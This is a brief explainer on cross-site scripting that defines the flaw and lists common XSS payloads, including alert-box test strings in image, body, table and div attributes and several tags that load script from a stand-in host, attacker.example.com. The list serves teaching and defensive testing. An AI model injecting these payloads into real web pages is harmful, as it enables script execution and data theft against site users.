What is cross-site scripting?

Cross-site scripting (XSS) is a web vulnerability that lets a malicious hacker introduce (inject) undesired commands into legitimate client-side code (usually JavaScript) executed by a browser on behalf of the web application.

XSS attack vectors

Common JavaScript language elements used in malicious payloads to perform cross-site scripting attacks include:

The <script> tag:
    <script src=http://attacker.example.com/xss.js></script>
    <script> alert("XSS");</script>
The onload and onerror attributes:
    <img src=x onerror=alert("XSS")>
    <body onload=alert("XSS")>
The <body> tag attributes:
    <body background="javascript:alert("XSS")">
The <img> tag attributes:
    <img src="javascript:alert("XSS");">
    <img dynsrc="javascript:alert('XSS')">
    <img lowsrc="javascript:alert('XSS')">
The <iframe> tag:
    <iframe src="http://attacker.example.com/xss.html">
The <input> tag attributes:
    <input type="image" src="javascript:alert('XSS');">
The <link> tag:
    <link rel="stylesheet" href="javascript:alert('XSS');">
The <table> and <td> tag attributes:
    <table background="javascript:alert('XSS')">
    <td background="javascript:alert('XSS')">
The <div> tag attributes:
    <div style="background-image: url(javascript:alert('XSS'))">
    <div style="width: expression(alert('XSS'));">
The <object> tag:
    <object type="text/x-scriptlet" data="http://attacker.example.com/xss.html">